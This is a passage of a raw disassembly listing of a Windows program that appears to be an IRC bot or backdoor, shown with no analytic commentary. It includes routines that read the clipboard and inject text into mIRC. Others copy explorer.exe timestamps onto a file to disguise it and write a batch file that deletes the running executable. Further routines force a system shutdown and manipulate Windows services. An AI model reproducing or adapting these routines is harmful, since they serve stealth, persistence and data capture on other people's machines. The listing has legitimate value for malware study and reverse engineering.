lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_4071BD: ; CODE XREF: sub_406EA4+302�j
lea eax, [ebp+var_200]
push eax
call sub_401F0F
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_406EA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4071CF proc near ; CODE XREF: sub_409848+A61�p
; sub_409848+A94�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz loc_4072A6
mov eax, [ebp+arg_4]
cmp eax, esi
jz loc_4072A6
cmp [ebp+arg_8], esi
jz loc_4072A6
cmp byte ptr [eax], 0
jz loc_4072A6
push ebx
push edi
call sub_4218F7
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_4072A1
push [ebp+arg_4]
push edi
call sub_417440
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40729A
sub eax, edi
push eax
push edi
push ebx
call sub_416A00
mov eax, ebx
sub eax, edi
add esp, 0Ch
and byte ptr [eax+esi], 0
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
loc_40723C: ; CODE XREF: sub_4071CF+72�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40723C
sub eax, ecx
push eax
push [ebp+arg_8]
push ebx
call sub_416840
mov eax, [ebp+arg_4]
add esp, 0Ch
lea ecx, [eax+1]
loc_407258: ; CODE XREF: sub_4071CF+8E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_407258
sub eax, ecx
add eax, esi
mov esi, eax
loc_407265: ; CODE XREF: sub_4071CF+9B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407265
mov edi, ebx
sub eax, esi
dec edi
loc_407271: ; CODE XREF: sub_4071CF+A8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_407271
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebp+arg_0]
mov edx, esi
mov eax, ebx
sub edx, ebx
loc_407290: ; CODE XREF: sub_4071CF+C9�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_407290
loc_40729A: ; CODE XREF: sub_4071CF+50�j
push ebx
call sub_416D07
pop ecx
loc_4072A1: ; CODE XREF: sub_4071CF+3B�j
mov eax, esi
pop ebx
jmp short loc_4072A8
; ---------------------------------------------------------------------------
loc_4072A6: ; CODE XREF: sub_4071CF+C�j
; sub_4071CF+17�j ...
xor eax, eax
loc_4072A8: ; CODE XREF: sub_4071CF+D5�j
pop edi
pop esi
pop ebp
retn
sub_4071CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4072AC proc near ; CODE XREF: sub_40946D+C2�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor eax, eax
mov ecx, 1F4h
lea edi, [ebp+var_7D0]
rep stosd
mov ecx, [ebp+arg_0]
mov eax, ecx
lea esi, [eax+1]
loc_4072CF: ; CODE XREF: sub_4072AC+28�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4072CF
sub eax, esi
xor ebx, ebx
mov edi, eax
inc ebx
cmp edi, ebx
jge short loc_4072E6
or eax, 0FFFFFFFFh
jmp short loc_407346
; ---------------------------------------------------------------------------
loc_4072E6: ; CODE XREF: sub_4072AC+33�j
xor edx, edx
test edi, edi
mov [ebp+var_7D0], ecx
jle short loc_407306
loc_4072F2: ; CODE XREF: sub_4072AC+58�j
mov al, [edx+ecx]
cmp al, 0Ah
jz short loc_4072FD
cmp al, 0Dh
jnz short loc_407301
loc_4072FD: ; CODE XREF: sub_4072AC+4B�j
and byte ptr [edx+ecx], 0
loc_407301: ; CODE XREF: sub_4072AC+4F�j
inc edx
cmp edx, edi
jl short loc_4072F2
loc_407306: ; CODE XREF: sub_4072AC+44�j
xor esi, esi
test edi, edi
jle short loc_407330
loc_40730C: ; CODE XREF: sub_4072AC+82�j
cmp byte ptr [esi+ecx], 0
jnz short loc_40732B
lea edx, [esi+ecx+1]
cmp byte ptr [edx], 0
jz short loc_40732B
cmp ebx, 1F4h
jge short loc_407330
mov [ebp+ebx*4+var_7D0], edx
inc ebx
loc_40732B: ; CODE XREF: sub_4072AC+64�j
; sub_4072AC+6D�j
inc esi
cmp esi, edi
jl short loc_40730C
loc_407330: ; CODE XREF: sub_4072AC+5E�j
; sub_4072AC+75�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_407344
mov ecx, 1F4h
lea esi, [ebp+var_7D0]
rep movsd
loc_407344: ; CODE XREF: sub_4072AC+89�j
mov eax, ebx
loc_407346: ; CODE XREF: sub_4072AC+38�j
pop edi
pop esi
pop ebx
leave
retn
sub_4072AC endp
; =============== S U B R O U T I N E =======================================
sub_40734B proc near ; CODE XREF: sub_4076F9+26�p
; sub_407736+79�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_4179CA
cmp al, 61h
pop ecx
jl short loc_407366
cmp al, 7Ah
jg short loc_407366
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_407366: ; CODE XREF: sub_40734B+E�j
; sub_40734B+12�j
xor eax, eax
retn
sub_40734B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407369 proc near ; CODE XREF: sub_409848+30C6�p
; sub_409848+3F6F�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call dword_422008 ; RtlGetLastWin32Error
push 0
push 100h
mov esi, eax
lea eax, [ebp+var_100]
push eax
push 400h
push esi
push 0
push 1200h
call dword_4220A8 ; FormatMessageA
lea eax, [ebp+var_100]
loc_4073A2: ; CODE XREF: sub_407369+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_4073AE
cmp cl, 9
jnz short loc_4073B1
loc_4073AE: ; CODE XREF: sub_407369+3E�j
inc eax
jmp short loc_4073A2
; ---------------------------------------------------------------------------
loc_4073B1: ; CODE XREF: sub_407369+43�j
; sub_407369+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_4073CB
mov cl, [eax]
cmp cl, 2Eh
jz short loc_4073B1
cmp cl, 21h
jl short loc_4073B1
loc_4073CB: ; CODE XREF: sub_407369+54�j
push esi
lea eax, [ebp+var_100]
push eax
push [ebp+arg_0]
mov esi, offset dword_43A588
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_416BCD
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_407369 endp
; =============== S U B R O U T I N E =======================================
sub_4073F3 proc near ; CODE XREF: sub_409848+4C46�p
push esi
push 0
call dword_43A35C ; OpenClipboard
test eax, eax
jz short loc_40742A
push 1
call dword_43A4F4 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_40742A
push edi
push esi
call dword_4220B0 ; GlobalLock
push esi
mov edi, eax
call dword_4220AC ; GlobalUnlock
call dword_43A340 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40742A: ; CODE XREF: sub_4073F3+B�j
; sub_4073F3+19�j
xor eax, eax
pop esi
retn
sub_4073F3 endp
; =============== S U B R O U T I N E =======================================
sub_40742E proc near ; CODE XREF: sub_409848+3DDD�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
push esi
mov edi, offset aMirc_0 ; "mIRC"
push edi
call dword_43A418 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_4074AA
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call dword_4220BC ; CreateFileMappingA
push esi
push esi
push esi
mov edi, eax
push 0F001Fh
push edi
call dword_4220B8 ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_416975
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_43A484 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_43A484 ; SendMessageA
push ebx
call dword_4220B4 ; UnmapViewOfFile
push edi
call dword_42202C ; CloseHandle
xor eax, eax
inc eax
pop ebx
jmp short loc_4074AC
; ---------------------------------------------------------------------------
loc_4074AA: ; CODE XREF: sub_40742E+16�j
xor eax, eax
loc_4074AC: ; CODE XREF: sub_40742E+7A�j
pop edi
pop esi
pop ebp
retn
sub_40742E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4074B0 proc near ; CODE XREF: sub_40FB4C+21E�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_43A3DC ; SearchPathA
test eax, eax
jz short loc_407551
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, dword_422034
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40754F
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call dword_4220C4 ; GetFileTime
push ebx
mov ebx, dword_42202C
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40754F
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call dword_4220C0 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_40754F: ; CODE XREF: sub_4074B0+51�j
; sub_4074B0+87�j
pop edi
pop ebx
loc_407551: ; CODE XREF: sub_4074B0+28�j
pop esi
leave
retn
sub_4074B0 endp
; =============== S U B R O U T I N E =======================================
sub_407554 proc near ; CODE XREF: sub_409848+117A�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_408CDE
pop ecx
pop ecx
push 50005h
push 6
call dword_43A45C ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_407554 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407576 proc near ; CODE XREF: sub_402C71+495�p
; sub_409848+4EF9�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push ebx
xor ebx, ebx
cmp dword_42FCD0, ebx
push esi
jz short loc_40759A
cmp dword_43A528, ebx
jnz short loc_40759A
push ebx
call sub_40214F
pop ecx
loc_40759A: ; CODE XREF: sub_407576+13�j
; sub_407576+1B�j
lea eax, [ebp+var_764]
push eax
push 400h
call dword_4220D0 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_416975
add esp, 0Ch
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_260]
push eax
call dword_422034 ; CreateFileA
mov esi, eax
cmp esi, ebx
jbe loc_4076F5
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_416975
lea eax, [ebp+var_764]
add esp, 0Ch
lea edx, [eax+1]
loc_40760D: ; CODE XREF: sub_407576+9C�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40760D
push edi
push ebx
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
lea eax, [ebp+var_764]
push eax
push esi
call dword_422030 ; WriteFile
push esi
call dword_42202C ; CloseHandle
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push 11h
stosd
pop ecx
xor eax, eax
lea edi, [ebp+var_58]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_15C]
push eax
push ebx
mov [ebp+var_4C], 422B02h
mov [ebp+var_58], 44h
mov [ebp+var_2C], 1
mov [ebp+var_28], bx
call dword_4220A4 ; GetModuleHandleA
push eax
call dword_422010 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call dword_4220A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
pop edi
jz short loc_40769E
push 80h
lea eax, [ebp+var_15C]
push eax
call dword_4220CC ; SetFileAttributesA
loc_40769E: ; CODE XREF: sub_407576+114�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_416975
add esp, 10h
push esi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_764]
push eax
call dword_4220C8 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push ebx
push ebx
push 4010h
push ebx
push ebx
push ebx
lea eax, [ebp+var_364]
push eax
push ebx
call dword_422044 ; CreateProcessA
loc_4076F5: ; CODE XREF: sub_407576+6D�j
pop esi
pop ebx
leave
retn
sub_407576 endp
; =============== S U B R O U T I N E =======================================
sub_4076F9 proc near ; CODE XREF: sub_407736+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
rep stosd
lea edi, [eax-1]
xor esi, esi
test edi, edi
jl short loc_407733
push ebx
mov ebx, edi
loc_407716: ; CODE XREF: sub_4076F9+37�j
mov eax, [esp+0Ch+arg_0]
movsx eax, byte ptr [esi+eax]
push eax
call sub_40734B
pop ecx
mov ecx, [esp+0Ch+arg_8]
inc esi
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_407716
pop ebx
loc_407733: ; CODE XREF: sub_4076F9+18�j
pop edi
pop esi
retn
sub_4076F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407736 proc near ; CODE XREF: sub_401FEF+10�p
; sub_402021+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_416B90
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_407749: ; CODE XREF: sub_407736+18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407749
sub eax, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_40775B: ; CODE XREF: sub_407736+2A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40775B
push ebx
push esi
sub eax, ecx
mov esi, eax
push edi
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_4076F9
add esp, 0Ch
dec esi
mov edi, esi
jmp short loc_4077F8
; ---------------------------------------------------------------------------
loc_407784: ; CODE XREF: sub_407736+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4179CA
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_4179CA
cmp eax, ebx
pop ecx
pop ecx
jz short loc_4077F6
loc_4077A6: ; CODE XREF: sub_407736+BE�j
mov ebx, [ebp+arg_0]
xor eax, eax
mov al, [edi+ebx]
push eax
call sub_40734B
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_4077C9
mov eax, ecx
loc_4077C9: ; CODE XREF: sub_407736+8F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_407806
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4179CA
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp+var_8], eax
call sub_4179CA
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_4077A6
loc_4077F6: ; CODE XREF: sub_407736+6E�j
dec edi
dec esi
loc_4077F8: ; CODE XREF: sub_407736+4C�j
test esi, esi
jg short loc_407784
mov eax, [ebp+arg_0]
add eax, edi
loc_407801: ; CODE XREF: sub_407736+D2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407806: ; CODE XREF: sub_407736+98�j
xor eax, eax
jmp short loc_407801
sub_407736 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40780A proc near ; CODE XREF: sub_4082EB+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push ebx
push ebx
call dword_43A480 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_407831
call dword_422008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_4078A6
; ---------------------------------------------------------------------------
loc_407831: ; CODE XREF: sub_40780A+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_43A500 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_407851
call dword_422008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40789E
; ---------------------------------------------------------------------------
loc_407851: ; CODE XREF: sub_40780A+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_407884
cmp eax, 3
jz short loc_407875
jle short loc_407897
cmp eax, 6
jg short loc_407897
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_43A4A4 ; ControlService
jmp short loc_40788B
; ---------------------------------------------------------------------------
loc_407875: ; CODE XREF: sub_40780A+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_43A488 ; StartServiceA
jmp short loc_40788B
; ---------------------------------------------------------------------------
loc_407884: ; CODE XREF: sub_40780A+4D�j
push esi
call dword_43A3B0 ; DeleteService
loc_40788B: ; CODE XREF: sub_40780A+69�j
; sub_40780A+78�j
test eax, eax
jnz short loc_407897
call dword_422008 ; RtlGetLastWin32Error
mov ebx, eax
loc_407897: ; CODE XREF: sub_40780A+54�j
; sub_40780A+59�j ...
push esi
call dword_43A3EC ; CloseServiceHandle
loc_40789E: ; CODE XREF: sub_40780A+45�j
push edi
call dword_43A3EC ; CloseServiceHandle
pop esi
loc_4078A6: ; CODE XREF: sub_40780A+25�j
pop edi
mov eax, ebx
pop ebx
leave
retn
sub_40780A endp
; =============== S U B R O U T I N E =======================================
sub_4078AC proc near ; CODE XREF: sub_4082EB:loc_408333�p
mov ecx, 420h
cmp eax, ecx
ja loc_40795D
jz loc_407956
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_407920
jz short loc_407916
mov ecx, eax
sub ecx, 3
jz short loc_40790C
dec ecx
dec ecx
jz short loc_407902
dec ecx
jz short loc_4078F8
sub ecx, 51h
jz short loc_4078EE
sub ecx, 24h
jnz loc_4079D3 ; default
; jumptable 0040797A cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_4079C5
; ---------------------------------------------------------------------------
loc_4078EE: ; CODE XREF: sub_4078AC+2D�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_4079C5
; ---------------------------------------------------------------------------
loc_4078F8: ; CODE XREF: sub_4078AC+28�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_4079C5
; ---------------------------------------------------------------------------
loc_407902: ; CODE XREF: sub_4078AC+25�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_4079C5
; ---------------------------------------------------------------------------
loc_40790C: ; CODE XREF: sub_4078AC+21�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_4079C5
; ---------------------------------------------------------------------------
loc_407916: ; CODE XREF: sub_4078AC+1A�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_4079C5
; ---------------------------------------------------------------------------
loc_407920: ; CODE XREF: sub_4078AC+18�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_40794F
dec ecx
jz short loc_407948
dec ecx
jz short loc_407941
dec ecx
jnz loc_4079D3 ; default
; jumptable 0040797A cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_4079C5
; ---------------------------------------------------------------------------
loc_407941: ; CODE XREF: sub_4078AC+82�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_407948: ; CODE XREF: sub_4078AC+7F�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_40794F: ; CODE XREF: sub_4078AC+7C�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_407956: ; CODE XREF: sub_4078AC+D�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_40795D: ; CODE XREF: sub_4078AC+7�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_4079D3 ; default
; jumptable 0040797A cases 1,5,6,8,9,12,13,15,16
jz short loc_4079C0
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_4079D3 ; default
; jumptable 0040797A cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_407A14[ecx]
jmp off_4079EC[ecx*4] ; switch jump
loc_407981: ; DATA XREF: .text:off_4079EC�o
push offset aTheSpecifiedDa ; jumptable 0040797A case 7
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_407988: ; CODE XREF: sub_4078AC+CE�j
; DATA XREF: .text:off_4079EC�o
push offset aTheServiceDepe ; jumptable 0040797A case 17
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_40798F: ; CODE XREF: sub_4078AC+CE�j
; DATA XREF: .text:off_4079EC�o
push offset aTheServiceDe_0 ; jumptable 0040797A case 10
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_407996: ; CODE XREF: sub_4078AC+CE�j
; DATA XREF: .text:off_4079EC�o
push offset aTheServiceHasB ; jumptable 0040797A case 0
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_40799D: ; CODE XREF: sub_4078AC+CE�j
; DATA XREF: .text:off_4079EC�o
push offset aTheSpecified_0 ; jumptable 0040797A case 2
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_4079A4: ; CODE XREF: sub_4078AC+CE�j
; DATA XREF: .text:off_4079EC�o
push offset aTheServiceCoul ; jumptable 0040797A case 11
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_4079AB: ; CODE XREF: sub_4078AC+CE�j
; DATA XREF: .text:off_4079EC�o
push offset aTheServiceHa_0 ; jumptable 0040797A case 14
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_4079B2: ; CODE XREF: sub_4078AC+CE�j
; DATA XREF: .text:off_4079EC�o
push offset aTheRequested_1 ; jumptable 0040797A case 3
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_4079B9: ; CODE XREF: sub_4078AC+CE�j
; DATA XREF: .text:off_4079EC�o
push offset aTheServiceHasN ; jumptable 0040797A case 4
jmp short loc_4079C5
; ---------------------------------------------------------------------------
loc_4079C0: ; CODE XREF: sub_4078AC+BA�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_4079C5: ; CODE XREF: sub_4078AC+3D�j
; sub_4078AC+47�j ...
push offset dword_43A788
call sub_416975
pop ecx
pop ecx
jmp short loc_4079E6
; ---------------------------------------------------------------------------
loc_4079D3: ; CODE XREF: sub_4078AC+32�j
; sub_4078AC+85�j ...
push eax ; default
; jumptable 0040797A cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_43A788
call sub_416975
add esp, 0Ch
loc_4079E6: ; CODE XREF: sub_4078AC+125�j
mov eax, offset dword_43A788
retn
sub_4078AC endp
; ---------------------------------------------------------------------------
off_4079EC dd offset loc_407996 ; DATA XREF: sub_4078AC+CE�r
dd offset loc_40799D ; jump table for switch statement
dd offset loc_4079B2
dd offset loc_4079B9
dd offset loc_407981
dd offset loc_40798F
dd offset loc_4079A4
dd offset loc_4079AB
dd offset loc_407988
dd offset loc_4079D3
byte_407A14 db 0, 9, 1, 2 ; DATA XREF: sub_4078AC+C7�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A26 proc near ; CODE XREF: sub_409848+1F19�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_43A480 ; OpenSCManagerA
push ebx
push [ebp+arg_8]
mov [ebp+var_C], eax
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_407A5E: ; CODE XREF: sub_407A26+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 168h
lea eax, [ebp+var_18C]
push eax
push 3
push 30h
push [ebp+var_C]
call dword_43A490 ; EnumServicesStatusA
test eax, eax
jnz short loc_407A98
call dword_422008 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_407B4F
loc_407A98: ; CODE XREF: sub_407A26+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_407B46
lea esi, [ebp+var_188]
loc_407AA9: ; CODE XREF: sub_407A26+11A�j
mov eax, [esi+8]
dec eax
jz short loc_407AF5
dec eax
jz short loc_407AEE
dec eax
jz short loc_407AE7
dec eax
jz short loc_407AE0
dec eax
jz short loc_407AD9
dec eax
jz short loc_407AD2
dec eax
lea eax, [ebp+var_20]
jz short loc_407ACB
push offset aUnknown_0 ; " Unknown"
jmp short loc_407AFD
; ---------------------------------------------------------------------------
loc_407ACB: ; CODE XREF: sub_407A26+9C�j
push offset aPaused_0 ; " Paused"
jmp short loc_407AFD
; ---------------------------------------------------------------------------
loc_407AD2: ; CODE XREF: sub_407A26+96�j
push offset aPausing ; " Pausing"
jmp short loc_407AFA
; ---------------------------------------------------------------------------
loc_407AD9: ; CODE XREF: sub_407A26+93�j
push offset aContinuing ; " Continuing"
jmp short loc_407AFA
; ---------------------------------------------------------------------------
loc_407AE0: ; CODE XREF: sub_407A26+90�j
push offset aRunning ; " Running"
jmp short loc_407AFA
; ---------------------------------------------------------------------------
loc_407AE7: ; CODE XREF: sub_407A26+8D�j
push offset aStoping ; " Stoping"
jmp short loc_407AFA
; ---------------------------------------------------------------------------
loc_407AEE: ; CODE XREF: sub_407A26+8A�j
push offset aStarting ; " Starting"
jmp short loc_407AFA
; ---------------------------------------------------------------------------
loc_407AF5: ; CODE XREF: sub_407A26+87�j
push offset aStopped ; " Stopped"
loc_407AFA: ; CODE XREF: sub_407A26+B1�j
; sub_407A26+B8�j ...
lea eax, [ebp+var_20]
loc_407AFD: ; CODE XREF: sub_407A26+A3�j
; sub_407A26+AA�j
push eax
call sub_416975
pop ecx
pop ecx
push dword ptr [esi]
lea eax, [ebp+var_20]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax
call sub_416975
push 1
push [ebp+arg_8]
lea eax, [ebp+var_38C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_407AA9
loc_407B46: ; CODE XREF: sub_407A26+77�j
cmp [ebp+var_8], ebx
jnz loc_407A5E
loc_407B4F: ; CODE XREF: sub_407A26+6C�j
push [ebp+var_C]
call dword_43A3EC ; CloseServiceHandle
xor eax, eax
cmp eax, [ebp+var_4]
pop edi
sbb eax, eax
pop esi
neg eax
pop ebx
leave
retn
sub_407A26 endp
; =============== S U B R O U T I N E =======================================
sub_407B66 proc near ; CODE XREF: sub_407C28+A�p
; sub_407C28+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_407B73
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407B73: ; CODE XREF: sub_407B66+9�j
push ebx
push esi
mov esi, dword_4220D4
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_4179EC
pop ecx
push edi
mov ebx, eax
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
